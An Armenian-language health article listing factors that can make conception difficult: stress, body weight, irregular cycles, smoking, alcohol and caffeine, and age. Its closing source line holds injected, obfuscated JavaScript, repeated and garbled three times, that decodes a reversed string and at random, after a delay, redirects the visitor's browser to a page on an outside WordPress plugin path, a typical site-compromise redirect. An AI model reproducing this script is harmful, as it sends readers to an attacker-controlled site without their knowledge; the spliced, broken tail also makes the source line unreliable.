Ի՞նչը կարող է խանգարել հղիանալուն

Ընտանիքի լիարժեքությունը իհարկե նաև պայմանավորված է երեխաներով։ Սակայն շատ կանայք դժվարանում են հղիանալ տարատեսակ խնդիրների պատճառով։  Այսպիսով ձեզ ենք ներկայացնում հանգմանաքներ, որոնք կարող են դժվարացնել կնոջ հղիանալը ։

 

Սթրես

Դժվար է հղիանալ, երբ սթրեսային վիճակում եք։ Սթրեսի արդյունքում կարող են խանգավրելուղեղի այն գործընթացները, որոնք պատասխանատու են օվուլյացիան վերահսկող հորմոններիազատման համար: Եթե ձեր զուգընկերն է սթերային վիճակում, ապա նրանց ուղեղի նույն մասը`հիպոթալամուսը, սկսում է վերահսկել տեստոստերոնի արտադրությունը:
Սթրեսի ընթացքում կնոջ ձվարանները կարող են անկանոն կերպով իրականացնել ձվազատումկամ կարող են ընդհանրապես չձվազատվել։

Եթե դուք կամ ձեր զուգընկերը սթրեսային վիճակում եք, ապա պետք է փորձեք ազատվել սթրեսից կամ նվազեցնել այն, որպեսզի ավելի դյուրին լինի բեղմնավորման պրոցեսը:

 

Քաշ

Ձվարանների նման, ճարպային բջիջները նույնպես արտադրում են էստրոգեն հորմոն: Երբ դուքունեք ավելորդ քաշ, շատ հնարավոր է, որ դուք ունենաք էստրոգենի ավելցուկ, ինչը կարող էհանգեցնել օվուլացիայի խանգարման:
Մյուս կողմից, քաշի պակասը նույնպես ազդում է հղիանալուն, քանի որ այդ ժամանակ ձերմարմինը քիչ քանակությամբ էստրոգեն է արտադրում, իսկ բավական քանակությամբ էստրոգենչունենալը կարող է հանգեցնել օվուլացիայի հետ խնդիրների:

Այսպիսով՝ առողջ մարմնի քաշի պահպանումը և հավասարակշռված սննդակարգ ունենալը՝ կարողէ օգնել մեծացնել հղիանալու ձեր հնարավորությունները:

 

Դաշտանային ցիկլի անկանոնություն

Դաշտանային ցիկլի ընթացքում կա մի քանի օր, երբ հավանականությունը, որ դուք կհղիանաք շատ ավելի մեծ է։ Դա ձեր օվուլացիայի շրջանն է։
Հղիանալու համար, փորձեք հետևել, թե ե՞րբ է սկսվում ձեր օրգանիզմում օվուլյացիայի շրջանը: Օվուլյացիայի ընթացքում ձեր մարմնի ջերմաստիճանը մի փոքր բարձրանում է: Եթե ամեն առավոտ ստուգում եք ձեր ջերմաստիճանը, ապա եթե նկատեք, որ ձեր մարմնի ջերմությունը երեք օր անընդմեջ բարձրանում է ձեր սովորական ջերմությունից, նշանակում է, որ դուք օվուլյացիայի շրջանում եք:

 

Անառողջ ապրելակերպ

Ծխախոտ ծխելը և ալկոհոլ խմելը կարող են ազդել բեղմնավորման պրոցեսին։ Ալկոհոլի ևծխախոտի քիմիական նյութերը և տոքսինները փոփոխում են ձեր հորմոնի մակարդակը՝խանգարելով ձեր հղիության պլաններին: Նույնը վերաբերում է կոֆեինի առկայությանը:
Այսպիսով հեռու մնալով ծխախոտից, ալկոհոլից և կոֆեինից, դուք կարող եք ավելի հեշտությամբ հղիանալ:

 

Տարիք

Այս օրերին շատ մարդիկ ավելի երկար են սպասում երեխաներ ունենալու համար: Այնուամենայնիվ, որքան երկար սպասեք, այնքան տարիքի հետ ավելի դժվար կլինի հղիանալը:
Կանանց համար հղիանալն ավելի դժվար է դառնում մեծ տարիքում, քանի որ տարիքի հետ կնոջ օրգանիզմում սկսում է դանդաղել ձվազատումը:

 

Աղբյուրը՝ $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-conceive/sex-for-getting-pregnant/is-it-hard-toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-get-pregnant”>flo.health